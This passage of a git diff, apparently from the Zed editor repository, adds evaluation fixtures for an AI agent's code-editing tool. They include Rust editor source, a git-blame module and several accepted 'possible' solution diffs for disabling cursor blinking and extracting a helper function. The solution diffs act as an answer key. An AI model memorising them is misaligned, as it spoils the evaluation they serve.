Arc::new(Mutex::new(GutterDimensions::default())), + block_ids: Default::default(), + _subscriptions: vec![], + } + } + + pub(crate) fn add_block_ids(&mut self, block_ids: Vec) { + self.block_ids.extend(block_ids) + } + + fn confirm(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context) { + if let Some(editor) = self.editor.upgrade() { + let message = self + .prompt + .read(cx) + .buffer + .read(cx) + .as_singleton() + .expect("A multi buffer in breakpoint prompt isn't possible") + .read(cx) + .as_rope() + .to_string(); + + editor.update(cx, |editor, cx| { + editor.edit_breakpoint_at_anchor( + self.breakpoint_anchor, + self.breakpoint.clone(), + match self.edit_action { + BreakpointPromptEditAction::Log => { + BreakpointEditAction::EditLogMessage(message.into()) + } + BreakpointPromptEditAction::Condition => { + BreakpointEditAction::EditCondition(message.into()) + } + BreakpointPromptEditAction::HitCondition => { + BreakpointEditAction::EditHitCondition(message.into()) + } + }, + cx, + ); + + editor.remove_blocks(self.block_ids.clone(), None, cx); + cx.focus_self(window); + }); + } + } + + fn cancel(&mut self, _: &menu::Cancel, window: &mut Window, cx: &mut Context) { + self.editor + .update(cx, |editor, cx| { + editor.remove_blocks(self.block_ids.clone(), None, cx); + window.focus(&editor.focus_handle); + }) + .log_err(); + } + + fn render_prompt_editor(&self, cx: &mut Context) -> impl IntoElement { + let settings = ThemeSettings::get_global(cx); + let text_style = TextStyle { + color: if self.prompt.read(cx).read_only(cx) { + cx.theme().colors().text_disabled + } else { + cx.theme().colors().text + }, + font_family: settings.buffer_font.family.clone(), + font_fallbacks: settings.buffer_font.fallbacks.clone(), + font_size: settings.buffer_font_size(cx).into(), + font_weight: settings.buffer_font.weight, + line_height: relative(settings.buffer_line_height.value()), + ..Default::default() + }; + EditorElement::new( + &self.prompt, + EditorStyle { + background: cx.theme().colors().editor_background, + local_player: cx.theme().players().local(), + text: text_style, + ..Default::default() + }, + ) + } +} + +impl Render for BreakpointPromptEditor { + fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + let gutter_dimensions = *self.gutter_dimensions.lock(); + h_flex() + .key_context("Editor") + .bg(cx.theme().colors().editor_background) + .border_y_1() + .border_color(cx.theme().status().info_border) + .size_full() + .py(window.line_height() / 2.5) + .on_action(cx.listener(Self::confirm)) + .on_action(cx.listener(Self::cancel)) + .child(h_flex().w(gutter_dimensions.full_width() + (gutter_dimensions.margin / 2.0))) + .child(div().flex_1().child(self.render_prompt_editor(cx))) + } +} + +impl Focusable for BreakpointPromptEditor { + fn focus_handle(&self, cx: &App) -> FocusHandle { + self.prompt.focus_handle(cx) + } +} + +fn all_edits_insertions_or_deletions( + edits: &Vec<(Range, String)>, + snapshot: &MultiBufferSnapshot, +) -> bool { + let mut all_insertions = true; + let mut all_deletions = true; + + for (range, new_text) in edits.iter() { + let range_is_empty = range.to_offset(&snapshot).is_empty(); + let text_is_empty = new_text.is_empty(); + + if range_is_empty != text_is_empty { + if range_is_empty { + all_deletions = false; + } else { + all_insertions = false; + } + } else { + return false; + } + + if !all_insertions && !all_deletions { + return false; + } + } + all_insertions || all_deletions +} + +struct MissingEditPredictionKeybindingTooltip; + +impl Render for MissingEditPredictionKeybindingTooltip { + fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + ui::tooltip_container(window, cx, |container, _, cx| { + container + .flex_shrink_0() + .max_w_80() + .min_h(rems_from_px(124.)) + .justify_between() + .child( + v_flex() + .flex_1() + .text_ui_sm(cx) + .child(Label::new("Conflict with Accept Keybinding")) + .child("Your keymap currently overrides the default accept keybinding. To continue, assign one keybinding for the `editor::AcceptEditPrediction` action.") + ) + .child( + h_flex() + .pb_1() + .gap_1() + .items_end() + .w_full() + .child(Button::new("open-keymap", "Assign Keybinding").size(ButtonSize::Compact).on_click(|_ev, window, cx| { + window.dispatch_action(zed_actions::OpenKeymap.boxed_clone(), cx) + })) + .child(Button::new("see-docs", "See Docs").size(ButtonSize::Compact).on_click(|_ev, _window, cx| { + cx.open_url("https://zed.dev/docs/completions#edit-predictions-missing-keybinding"); + })), + ) + }) + } +} + +#[derive(Debug, Clone, Copy, PartialEq)] +pub struct LineHighlight { + pub background: Background, + pub border: Option, + pub include_gutter: bool, + pub type_id: Option, +} + +fn render_diff_hunk_controls( + row: u32, + status: &DiffHunkStatus, + hunk_range: Range, + is_created_file: bool, + line_height: Pixels, + editor: &Entity, + _window: &mut Window, + cx: &mut App, +) -> AnyElement { + h_flex() + .h(line_height) + .mr_1() + .gap_1() + .px_0p5() + .pb_1() + .border_x_1() + .border_b_1() + .border_color(cx.theme().colors().border_variant) + .rounded_b_lg() + .bg(cx.theme().colors().editor_background) + .gap_1() + .occlude() + .shadow_md() + .child(if status.has_secondary_hunk() { + Button::new(("stage", row as u64), "Stage") + .alpha(if status.is_pending() { 0.66 } else { 1.0 }) + .tooltip({ + let focus_handle = editor.focus_handle(cx); + move |window, cx| { + Tooltip::for_action_in( + "Stage Hunk", + &::git::ToggleStaged, + &focus_handle, + window, + cx, + ) + } + }) + .on_click({ + let editor = editor.clone(); + move |_event, _window, cx| { + editor.update(cx, |editor, cx| { + editor.stage_or_unstage_diff_hunks( + true, + vec![hunk_range.start..hunk_range.start], + cx, + ); + }); + } + }) + } else { + Button::new(("unstage", row as u64), "Unstage") + .alpha(if status.is_pending() { 0.66 } else { 1.0 }) + .tooltip({ + let focus_handle = editor.focus_handle(cx); + move |window, cx| { + Tooltip::for_action_in( + "Unstage Hunk", + &::git::ToggleStaged, + &focus_handle, + window, + cx, + ) + } + }) + .on_click({ + let editor = editor.clone(); + move |_event, _window, cx| { + editor.update(cx, |editor, cx| { + editor.stage_or_unstage_diff_hunks( + false, + vec![hunk_range.start..hunk_range.start], + cx, + ); + }); + } + }) + }) + .child( + Button::new(("restore", row as u64), "Restore") + .tooltip({ + let focus_handle = editor.focus_handle(cx); + move |window, cx| { + Tooltip::for_action_in( + "Restore Hunk", + &::git::Restore, + &focus_handle, + window, + cx, + ) + } + }) + .on_click({ + let editor = editor.clone(); + move |_event, window, cx| { + editor.update(cx, |editor, cx| { + let snapshot = editor.snapshot(window, cx); + let point = hunk_range.start.to_point(&snapshot.buffer_snapshot); + editor.restore_hunks_in_ranges(vec![point..point], window, cx); + }); + } + }) + .disabled(is_created_file), + ) + .when( + !editor.read(cx).buffer().read(cx).all_diff_hunks_expanded(), + |el| { + el.child( + IconButton::new(("next-hunk", row as u64), IconName::ArrowDown) + .shape(IconButtonShape::Square) + .icon_size(IconSize::Small) + // .disabled(!has_multiple_hunks) + .tooltip({ + let focus_handle = editor.focus_handle(cx); + move |window, cx| { + Tooltip::for_action_in( + "Next Hunk", + &GoToHunk, + &focus_handle, + window, + cx, + ) + } + }) + .on_click({ + let editor = editor.clone(); + move |_event, window, cx| { + editor.update(cx, |editor, cx| { + let snapshot = editor.snapshot(window, cx); + let position = + hunk_range.end.to_point(&snapshot.buffer_snapshot); + editor.go_to_hunk_before_or_after_position( + &snapshot, + position, + Direction::Next, + window, + cx, + ); + editor.expand_selected_diff_hunks(cx); + }); + } + }), + ) + .child( + IconButton::new(("prev-hunk", row as u64), IconName::ArrowUp) + .shape(IconButtonShape::Square) + .icon_size(IconSize::Small) + // .disabled(!has_multiple_hunks) + .tooltip({ + let focus_handle = editor.focus_handle(cx); + move |window, cx| { + Tooltip::for_action_in( + "Previous Hunk", + &GoToPreviousHunk, + &focus_handle, + window, + cx, + ) + } + }) + .on_click({ + let editor = editor.clone(); + move |_event, window, cx| { + editor.update(cx, |editor, cx| { + let snapshot = editor.snapshot(window, cx); + let point = + hunk_range.start.to_point(&snapshot.buffer_snapshot); + editor.go_to_hunk_before_or_after_position( + &snapshot, + point, + Direction::Prev, + window, + cx, + ); + editor.expand_selected_diff_hunks(cx); + }); + } + }), + ) + }, + ) + .into_any_element() +} diff --git a/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-01.diff b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-01.diff new file mode 100644 index 0000000000000000000000000000000000000000..1a38a1967f94c974de491c712babb7882020d697 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-01.diff @@ -0,0 +1,28 @@ +--- before.rs 2025-07-07 11:37:48.434629001 +0300 ++++ expected.rs 2025-07-14 10:33:53.346906775 +0300 +@@ -1780,11 +1780,11 @@ + cx.observe_window_activation(window, |editor, window, cx| { + let active = window.is_window_active(); + editor.blink_manager.update(cx, |blink_manager, cx| { +- if active { +- blink_manager.enable(cx); +- } else { +- blink_manager.disable(cx); +- } ++ // if active { ++ // blink_manager.enable(cx); ++ // } else { ++ // blink_manager.disable(cx); ++ // } + }); + }), + ], +@@ -18463,7 +18463,7 @@ + } + + self.blink_manager.update(cx, |blink_manager, cx| { +- blink_manager.enable(cx); ++ // blink_manager.enable(cx); + }); + self.show_cursor_names(window, cx); + self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-02.diff b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-02.diff new file mode 100644 index 0000000000000000000000000000000000000000..b484cce48f71b232ddaa947a73940b8bf11846c6 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-02.diff @@ -0,0 +1,29 @@ +@@ -1778,13 +1778,13 @@ + cx.observe_global_in::(window, Self::settings_changed), + observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), + cx.observe_window_activation(window, |editor, window, cx| { +- let active = window.is_window_active(); ++ // let active = window.is_window_active(); + editor.blink_manager.update(cx, |blink_manager, cx| { +- if active { +- blink_manager.enable(cx); +- } else { +- blink_manager.disable(cx); +- } ++ // if active { ++ // blink_manager.enable(cx); ++ // } else { ++ // blink_manager.disable(cx); ++ // } + }); + }), + ], +@@ -18463,7 +18463,7 @@ + } + + self.blink_manager.update(cx, |blink_manager, cx| { +- blink_manager.enable(cx); ++ // blink_manager.enable(cx); + }); + self.show_cursor_names(window, cx); + self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-03.diff b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-03.diff new file mode 100644 index 0000000000000000000000000000000000000000..431e34e48a250bff80efbd5a2cc20ecc25be1020 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-03.diff @@ -0,0 +1,34 @@ +@@ -1774,17 +1774,17 @@ + cx.observe(&buffer, Self::on_buffer_changed), + cx.subscribe_in(&buffer, window, Self::on_buffer_event), + cx.observe_in(&display_map, window, Self::on_display_map_changed), +- cx.observe(&blink_manager, |_, _, cx| cx.notify()), ++ // cx.observe(&blink_manager, |_, _, cx| cx.notify()), + cx.observe_global_in::(window, Self::settings_changed), + observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), + cx.observe_window_activation(window, |editor, window, cx| { +- let active = window.is_window_active(); ++ // let active = window.is_window_active(); + editor.blink_manager.update(cx, |blink_manager, cx| { +- if active { +- blink_manager.enable(cx); +- } else { +- blink_manager.disable(cx); +- } ++ // if active { ++ // blink_manager.enable(cx); ++ // } else { ++ // blink_manager.disable(cx); ++ // } + }); + }), + ], +@@ -18463,7 +18463,7 @@ + } + + self.blink_manager.update(cx, |blink_manager, cx| { +- blink_manager.enable(cx); ++ // blink_manager.enable(cx); + }); + self.show_cursor_names(window, cx); + self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-04.diff b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-04.diff new file mode 100644 index 0000000000000000000000000000000000000000..64a6b85dd3751407db65da74656b66ee1beaf58b --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/disable_cursor_blinking/possible-04.diff @@ -0,0 +1,33 @@ +@@ -1774,17 +1774,17 @@ + cx.observe(&buffer, Self::on_buffer_changed), + cx.subscribe_in(&buffer, window, Self::on_buffer_event), + cx.observe_in(&display_map, window, Self::on_display_map_changed), +- cx.observe(&blink_manager, |_, _, cx| cx.notify()), ++ // cx.observe(&blink_manager, |_, _, cx| cx.notify()), + cx.observe_global_in::(window, Self::settings_changed), + observe_buffer_font_size_adjustment(cx, |_, cx| cx.notify()), + cx.observe_window_activation(window, |editor, window, cx| { + let active = window.is_window_active(); + editor.blink_manager.update(cx, |blink_manager, cx| { +- if active { +- blink_manager.enable(cx); +- } else { +- blink_manager.disable(cx); +- } ++ // if active { ++ // blink_manager.enable(cx); ++ // } else { ++ // blink_manager.disable(cx); ++ // } + }); + }), + ], +@@ -18463,7 +18463,7 @@ + } + + self.blink_manager.update(cx, |blink_manager, cx| { +- blink_manager.enable(cx); ++ // blink_manager.enable(cx); + }); + self.show_cursor_names(window, cx); + self.buffer.update(cx, |buffer, cx| { diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/before.rs b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/before.rs new file mode 100644 index 0000000000000000000000000000000000000000..36fccb513271265ff7ae3d54b6f974beeb809737 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/before.rs @@ -0,0 +1,371 @@ +use crate::commit::get_messages; +use crate::{GitRemote, Oid}; +use anyhow::{Context as _, Result, anyhow}; +use collections::{HashMap, HashSet}; +use futures::AsyncWriteExt; +use gpui::SharedString; +use serde::{Deserialize, Serialize}; +use std::process::Stdio; +use std::{ops::Range, path::Path}; +use text::Rope; +use time::OffsetDateTime; +use time::UtcOffset; +use time::macros::format_description; + +pub use git2 as libgit; + +#[derive(Debug, Clone, Default)] +pub struct Blame { + pub entries: Vec, + pub messages: HashMap, + pub remote_url: Option, +} + +#[derive(Clone, Debug, Default)] +pub struct ParsedCommitMessage { + pub message: SharedString, + pub permalink: Option, + pub pull_request: Option, + pub remote: Option, +} + +impl Blame { + pub async fn for_path( + git_binary: &Path, + working_directory: &Path, + path: &Path, + content: &Rope, + remote_url: Option, + ) -> Result { + let output = run_git_blame(git_binary, working_directory, path, content).await?; + let mut entries = parse_git_blame(&output)?; + entries.sort_unstable_by(|a, b| a.range.start.cmp(&b.range.start)); + + let mut unique_shas = HashSet::default(); + + for entry in entries.iter_mut() { + unique_shas.insert(entry.sha); + } + + let shas = unique_shas.into_iter().collect::>(); + let messages = get_messages(working_directory, &shas) + .await + .context("failed to get commit messages")?; + + Ok(Self { + entries, + messages, + remote_url, + }) + } +} + +const GIT_BLAME_NO_COMMIT_ERROR: &str = "fatal: no such ref: HEAD"; +const GIT_BLAME_NO_PATH: &str = "fatal: no such path"; + +async fn run_git_blame( + git_binary: &Path, + working_directory: &Path, + path: &Path, + contents: &Rope, +) -> Result { + let mut child = util::command::new_smol_command(git_binary) + .current_dir(working_directory) + .arg("blame") + .arg("--incremental") + .arg("--contents") + .arg("-") + .arg(path.as_os_str()) + .stdin(Stdio::piped()) + .stdout(Stdio::piped()) + .stderr(Stdio::piped()) + .spawn() + .context("starting git blame process")?; + + let stdin = child + .stdin + .as_mut() + .context("failed to get pipe to stdin of git blame command")?; + + for chunk in contents.chunks() { + stdin.write_all(chunk.as_bytes()).await?; + } + stdin.flush().await?; + + let output = child.output().await.context("reading git blame output")?; + + if !output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); + if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { + return Ok(String::new()); + } + anyhow::bail!("git blame process failed: {stderr}"); + } + + Ok(String::from_utf8(output.stdout)?) +} + +#[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] +pub struct BlameEntry { + pub sha: Oid, + + pub range: Range, + + pub original_line_number: u32, + + pub author: Option, + pub author_mail: Option, + pub author_time: Option, + pub author_tz: Option, + + pub committer_name: Option, + pub committer_email: Option, + pub committer_time: Option, + pub committer_tz: Option, + + pub summary: Option, + + pub previous: Option, + pub filename: String, +} + +impl BlameEntry { + // Returns a BlameEntry by parsing the first line of a `git blame --incremental` + // entry. The line MUST have this format: + // + // <40-byte-hex-sha1> + fn new_from_blame_line(line: &str) -> Result { + let mut parts = line.split_whitespace(); + + let sha = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing sha from {line}"))?; + + let original_line_number = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing original line number from {line}"))?; + let final_line_number = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing final line number from {line}"))?; + + let line_count = parts + .next() + .and_then(|line| line.parse::().ok()) + .with_context(|| format!("parsing line count from {line}"))?; + + let start_line = final_line_number.saturating_sub(1); + let end_line = start_line + line_count; + let range = start_line..end_line; + + Ok(Self { + sha, + range, + original_line_number, + ..Default::default() + }) + } + + pub fn author_offset_date_time(&self) -> Result { + if let (Some(author_time), Some(author_tz)) = (self.author_time, &self.author_tz) { + let format = format_description!("[offset_hour][offset_minute]"); + let offset = UtcOffset::parse(author_tz, &format)?; + let date_time_utc = OffsetDateTime::from_unix_timestamp(author_time)?; + + Ok(date_time_utc.to_offset(offset)) + } else { + // Directly return current time in UTC if there's no committer time or timezone + Ok(time::OffsetDateTime::now_utc()) + } + } +} + +// parse_git_blame parses the output of `git blame --incremental`, which returns +// all the blame-entries for a given path incrementally, as it finds them. +// +// Each entry *always* starts with: +// +// <40-byte-hex-sha1> +// +// Each entry *always* ends with: +// +// filename +// +// Line numbers are 1-indexed. +// +// A `git blame --incremental` entry looks like this: +// +// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 2 2 1 +// author Joe Schmoe +// author-mail +// author-time 1709741400 +// author-tz +0100 +// committer Joe Schmoe +// committer-mail +// committer-time 1709741400 +// committer-tz +0100 +// summary Joe's cool commit +// previous 486c2409237a2c627230589e567024a96751d475 index.js +// filename index.js +// +// If the entry has the same SHA as an entry that was already printed then no +// signature information is printed: +// +// 6ad46b5257ba16d12c5ca9f0d4900320959df7f4 3 4 1 +// previous 486c2409237a2c627230589e567024a96751d475 index.js +// filename index.js +// +// More about `--incremental` output: https://mirrors.edge.kernel.org/pub/software/scm/git/docs/git-blame.html +fn parse_git_blame(output: &str) -> Result> { + let mut entries: Vec = Vec::new(); + let mut index: HashMap = HashMap::default(); + + let mut current_entry: Option = None; + + for line in output.lines() { + let mut done = false; + + match &mut current_entry { + None => { + let mut new_entry = BlameEntry::new_from_blame_line(line)?; + + if let Some(existing_entry) = index + .get(&new_entry.sha) + .and_then(|slot| entries.get(*slot)) + { + new_entry.author.clone_from(&existing_entry.author); + new_entry + .author_mail + .clone_from(&existing_entry.author_mail); + new_entry.author_time = existing_entry.author_time; + new_entry.author_tz.clone_from(&existing_entry.author_tz); + new_entry + .committer_name + .clone_from(&existing_entry.committer_name); + new_entry + .committer_email + .clone_from(&existing_entry.committer_email); + new_entry.committer_time = existing_entry.committer_time; + new_entry + .committer_tz + .clone_from(&existing_entry.committer_tz); + new_entry.summary.clone_from(&existing_entry.summary); + } + + current_entry.replace(new_entry); + } + Some(entry) => { + let Some((key, value)) = line.split_once(' ') else { + continue; + }; + let is_committed = !entry.sha.is_zero(); + match key { + "filename" => { + entry.filename = value.into(); + done = true; + } + "previous" => entry.previous = Some(value.into()), + + "summary" if is_committed => entry.summary = Some(value.into()), + "author" if is_committed => entry.author = Some(value.into()), + "author-mail" if is_committed => entry.author_mail = Some(value.into()), + "author-time" if is_committed => { + entry.author_time = Some(value.parse::()?) + } + "author-tz" if is_committed => entry.author_tz = Some(value.into()), + + "committer" if is_committed => entry.committer_name = Some(value.into()), + "committer-mail" if is_committed => entry.committer_email = Some(value.into()), + "committer-time" if is_committed => { + entry.committer_time = Some(value.parse::()?) + } + "committer-tz" if is_committed => entry.committer_tz = Some(value.into()), + _ => {} + } + } + }; + + if done { + if let Some(entry) = current_entry.take() { + index.insert(entry.sha, entries.len()); + + // We only want annotations that have a commit. + if !entry.sha.is_zero() { + entries.push(entry); + } + } + } + } + + Ok(entries) +} + +#[cfg(test)] +mod tests { + use std::path::PathBuf; + + use super::BlameEntry; + use super::parse_git_blame; + + fn read_test_data(filename: &str) -> String { + let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); + path.push("test_data"); + path.push(filename); + + std::fs::read_to_string(&path) + .unwrap_or_else(|_| panic!("Could not read test data at {:?}. Is it generated?", path)) + } + + fn assert_eq_golden(entries: &Vec, golden_filename: &str) { + let mut path = PathBuf::from(env!("CARGO_MANIFEST_DIR")); + path.push("test_data"); + path.push("golden"); + path.push(format!("{}.json", golden_filename)); + + let mut have_json = + serde_json::to_string_pretty(&entries).expect("could not serialize entries to JSON"); + // We always want to save with a trailing newline. + have_json.push('\n'); + + let update = std::env::var("UPDATE_GOLDEN") + .map(|val| val.eq_ignore_ascii_case("true")) + .unwrap_or(false); + + if update { + std::fs::create_dir_all(path.parent().unwrap()) + .expect("could not create golden test data directory"); + std::fs::write(&path, have_json).expect("could not write out golden data"); + } else { + let want_json = + std::fs::read_to_string(&path).unwrap_or_else(|_| { + panic!("could not read golden test data file at {:?}. Did you run the test with UPDATE_GOLDEN=true before?", path); + }).replace("\r\n", "\n"); + + pretty_assertions::assert_eq!(have_json, want_json, "wrong blame entries"); + } + } + + #[test] + fn test_parse_git_blame_not_committed() { + let output = read_test_data("blame_incremental_not_committed"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_not_committed"); + } + + #[test] + fn test_parse_git_blame_simple() { + let output = read_test_data("blame_incremental_simple"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_simple"); + } + + #[test] + fn test_parse_git_blame_complex() { + let output = read_test_data("blame_incremental_complex"); + let entries = parse_git_blame(&output).unwrap(); + assert_eq_golden(&entries, "blame_incremental_complex"); + } +} diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-01.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-01.diff new file mode 100644 index 0000000000000000000000000000000000000000..c13a223c63f4226ac0f1bf5e7221551e586827f5 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-01.diff @@ -0,0 +1,11 @@ +@@ -94,6 +94,10 @@ + + let output = child.output().await.context("reading git blame output")?; + ++ handle_command_output(output) ++} ++ ++fn handle_command_output(output: std::process::Output) -> Result { + if !output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-02.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-02.diff new file mode 100644 index 0000000000000000000000000000000000000000..aa36a9241e9706a3413277f07c7a2a0364df24b7 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-02.diff @@ -0,0 +1,26 @@ +@@ -95,15 +95,19 @@ + let output = child.output().await.context("reading git blame output")?; + + if !output.status.success() { +- let stderr = String::from_utf8_lossy(&output.stderr); +- let trimmed = stderr.trim(); +- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { +- return Ok(String::new()); +- } +- anyhow::bail!("git blame process failed: {stderr}"); ++ return handle_command_output(output); + } + + Ok(String::from_utf8(output.stdout)?) ++} ++ ++fn handle_command_output(output: std::process::Output) -> Result { ++ let stderr = String::from_utf8_lossy(&output.stderr); ++ let trimmed = stderr.trim(); ++ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { ++ return Ok(String::new()); ++ } ++ anyhow::bail!("git blame process failed: {stderr}"); + } + + #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-03.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-03.diff new file mode 100644 index 0000000000000000000000000000000000000000..d3c19b43803941ca9c17ace5d72fe72d6c3361df --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-03.diff @@ -0,0 +1,11 @@ +@@ -93,7 +93,10 @@ + stdin.flush().await?; + + let output = child.output().await.context("reading git blame output")?; ++ handle_command_output(output) ++} + ++fn handle_command_output(output: std::process::Output) -> Result { + if !output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-04.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-04.diff new file mode 100644 index 0000000000000000000000000000000000000000..1f87e4352c60ceb3df2fab57dd7b7e7e13dad95e --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-04.diff @@ -0,0 +1,24 @@ +@@ -93,17 +93,20 @@ + stdin.flush().await?; + + let output = child.output().await.context("reading git blame output")?; ++ handle_command_output(&output)?; ++ Ok(String::from_utf8(output.stdout)?) ++} + ++fn handle_command_output(output: &std::process::Output) -> Result<()> { + if !output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); + if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { +- return Ok(String::new()); ++ return Ok(()); + } + anyhow::bail!("git blame process failed: {stderr}"); + } +- +- Ok(String::from_utf8(output.stdout)?) ++ Ok(()) + } + + #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-05.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-05.diff new file mode 100644 index 0000000000000000000000000000000000000000..8f4b745b9a1105a2ff6511c141ea7459edb47b77 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-05.diff @@ -0,0 +1,26 @@ +@@ -95,15 +95,19 @@ + let output = child.output().await.context("reading git blame output")?; + + if !output.status.success() { +- let stderr = String::from_utf8_lossy(&output.stderr); +- let trimmed = stderr.trim(); +- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { +- return Ok(String::new()); +- } +- anyhow::bail!("git blame process failed: {stderr}"); ++ return handle_command_output(&output); + } + + Ok(String::from_utf8(output.stdout)?) ++} ++ ++fn handle_command_output(output: &std::process::Output) -> Result { ++ let stderr = String::from_utf8_lossy(&output.stderr); ++ let trimmed = stderr.trim(); ++ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { ++ return Ok(String::new()); ++ } ++ anyhow::bail!("git blame process failed: {stderr}"); + } + + #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-06.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-06.diff new file mode 100644 index 0000000000000000000000000000000000000000..3514d9c8e2969c7286398f41cd8e00e3172774a8 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-06.diff @@ -0,0 +1,23 @@ +@@ -93,7 +93,12 @@ + stdin.flush().await?; + + let output = child.output().await.context("reading git blame output")?; ++ handle_command_output(&output)?; + ++ Ok(String::from_utf8(output.stdout)?) ++} ++ ++fn handle_command_output(output: &std::process::Output) -> Result { + if !output.status.success() { + let stderr = String::from_utf8_lossy(&output.stderr); + let trimmed = stderr.trim(); +@@ -102,8 +107,7 @@ + } + anyhow::bail!("git blame process failed: {stderr}"); + } +- +- Ok(String::from_utf8(output.stdout)?) ++ Ok(String::from_utf8_lossy(&output.stdout).into_owned()) + } + + #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-07.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-07.diff new file mode 100644 index 0000000000000000000000000000000000000000..9691479e2997ca654e1092499a880507c38b979c --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-07.diff @@ -0,0 +1,26 @@ +@@ -95,15 +95,19 @@ + let output = child.output().await.context("reading git blame output")?; + + if !output.status.success() { +- let stderr = String::from_utf8_lossy(&output.stderr); +- let trimmed = stderr.trim(); +- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { +- return Ok(String::new()); +- } +- anyhow::bail!("git blame process failed: {stderr}"); ++ return handle_command_output(output); + } + + Ok(String::from_utf8(output.stdout)?) ++} ++ ++fn handle_command_output(output: std::process::Output) -> Result { ++ let stderr = String::from_utf8_lossy(&output.stderr); ++ let trimmed = stderr.trim(); ++ if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { ++ return Ok(String::new()); ++ } ++ anyhow::bail!("git blame process failed: {stderr}"); + } + + #[derive(Serialize, Deserialize, Default, Debug, Clone, PartialEq, Eq)] diff --git a/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-08.diff b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-08.diff new file mode 100644 index 0000000000000000000000000000000000000000..f5da859005aef07d1c39e516d7c4688c575c7e9d --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/extract_handle_command_output/possible-08.diff @@ -0,0 +1,26 @@ +@@ -95,15 +95,19 @@ + let output = child.output().await.context("reading git blame output")?; + + if !output.status.success() { +- let stderr = String::from_utf8_lossy(&output.stderr); +- let trimmed = stderr.trim(); +- if trimmed == GIT_BLAME_NO_COMMIT_ERROR || trimmed.contains(GIT_BLAME_NO_PATH) { +- return Ok(String::new()); 